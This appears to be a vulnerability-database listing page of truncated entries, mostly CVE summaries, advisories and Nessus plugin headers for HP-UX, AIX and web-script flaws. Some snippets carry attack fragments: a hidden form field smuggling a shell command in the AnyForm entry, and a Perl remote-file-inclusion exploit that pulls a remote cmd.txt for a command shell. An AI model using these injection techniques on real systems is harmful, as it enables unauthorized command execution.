Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)

Exploit for unknown platform in category dos / poc ============================================================ Cerberus FTP 3.0.1 ALLO Remote Overflow DoS Exploit meta ============================================================ Application: Cerberus FTP 3.0.1 Platforms: Windows XP Professional...

AIX 6.1 : bos.rte.cron (U823854)

The remote host is missing AIX PTF U823854, which is related to the security of the package bos.rte.cron. The at command does not drop permissions when reading certain files. A local attacker may exploit this error to read any file on the system because the command is setuid root. The following...

BNB Survey.cgi脚本远程执行任意命令漏洞

BugCVE: CVE-1999-0936 BUGTRAQ: 1817 Survey.cgi是Big Nose Bird提供的一个基于Web的用于调查问卷的脚本。Survey.cgi实现上存在一个输入验证漏洞，远程攻击者可能利用此漏洞在主机上以Web进程的权限执行任意命令。 脚本对于用户输入未做充分过滤，攻击者可能在输入中混入“|”、“”、“”等Shell管道符或重定向符来执行Shell命令。 1.0 Big Nose Bird ------------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： Big Nose Bird BNBSurvey 1.0: Big...

Command injection

ELSEIF CMS Beta 0.6 does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary PHP code by uploading a .php file via externe/swfupload/upload.php. NOTE: it coul...

CVE-2007-1502

Multiple buffer overflows in Rhapsody IRC 0.28b allow remote attackers to execute arbitrary code via a 1 long command, 2 long server argument to the a connect or b server commands, 3 long nick argument to the c nick command, or a long 4 nick or 5 message argument to the d ctcp, e chat, f notice, ...

AnyForm脚本远程可执行任意命令漏洞 Exploit

No description provided by source. 创建一个表单包含以下隐含字段： input type="hidden" name="AnyFormTo" value="[email protected];cmd-to execute with whatever arguments;/usr/lib/sendmail -t [email protected]"...

Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - Socketwiz Bookmarks perl exploit.pl http://site.com/Socketwiz BookmarksPath/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; $sciezka = $ARGV0; $sciezk...

[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability

Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html Script : GrapAgenda Site : http://www.graphiks.net Version : 0.1 Risk : High Class : Remote Contact : [email protected] and irc.gigachat.net kurdhack Nice cracker...

CVE-2006-2547

Unspecified vulnerability in the sapdba command in SAP with Informix before 700, and 700 up to patch 100, allows local users to execute arbitrary commands via unknown vectors related to "insecure environment variable" handling...

CVE-2006-1599

Unspecified vulnerability in VCEngine.php in v-creator before 1.3-pre3, when the VCCRYPTOMETHOD option is OPENSSL, allows remote attackers to execute arbitrary commands, possibly due to problems in the 1 encrypt and 2 decrypt functions...

CVE-2005-3189

Directory traversal vulnerability in Qualcomm WorldMail IMAP Server allows remote attackers to read arbitrary email messages via ".." sequences in the SELECT command...

Cherokee remote command execution

The remote version of Cherokee is vulnerable to remote command execution due to a lack of web requests sanitization, especially shell metacharacters. Additionally, this version fails to drop root privileges after it binds to listen port. SPDX-FileCopyrightText: 2004 David Maciejak Some text...

CVE-2005-2081

Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the 'write = command' option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character...

ecart11.txt

------=Part73424926651.1114105332381 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=...

HP-UX Security patch : PHCO_11004

The remote host is missing HP-UX Security Patch number PHCO11004 . Security Vulnerability in swinstall command %NASLMINLEVEL 70300 C Tenable Network Security, Inc. if ! definedfunc"bnrandom" exit0; include'deprecatednasllevel.inc'; include'compat.inc'; ifdescription scriptid16480;...

HP-UX PHCO_21567 : HPSBUX0005-113 Sec. Vulnerability with shutdown command (rev.1)

s700800 11.04 VVOS patch for shutdown1M : shutdown1M improperly handles input variables. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and patch checks in this plugin were extracted from HP patch PHCO21567. The text itself is copyright C Hewlett-Packard Development...

HP-UX PHCO_22921 : HPSBUX0012-134 Sec. Vulnerability in top(1) (rev.1)

s700800 11.04 VVOS top1 cumulative patch : the top1 command has a security defect. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and patch checks in this plugin were extracted from HP patch PHCO22921. The text itself is copyright C Hewlett-Packard Development Company,...

HP-UX PHCO_24083 : HP-UX running login(1), Local Increased Privilege (HPSBUX00160 SSRT071385 rev.3)

s700800 11.00 login1 cumulative patch : The login1 command allows restricted shell users to circumvent security checks. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and patch checks in this plugin were extracted from HP patch PHCO24083. The text itself is copyright C...

HP-UX Security patch : PHCO_21566

The remote host is missing HP-UX Security Patch number PHCO21566 . Sec. Vulnerability with shutdown command %NASLMINLEVEL 70300 C Tenable Network Security, Inc. if ! definedfunc"bnrandom" exit0; include'deprecatednasllevel.inc'; include'compat.inc'; ifdescription scriptid16549; scriptversion"1.7"...

HP-UX Security patch : PHCO_21574

The remote host is missing HP-UX Security Patch number PHCO21574 . Sec. Vulnerability with shutdown command %NASLMINLEVEL 70300 C Tenable Network Security, Inc. if ! definedfunc"bnrandom" exit0; include'deprecatednasllevel.inc'; include'compat.inc'; ifdescription scriptid16547; scriptversion"1.7"...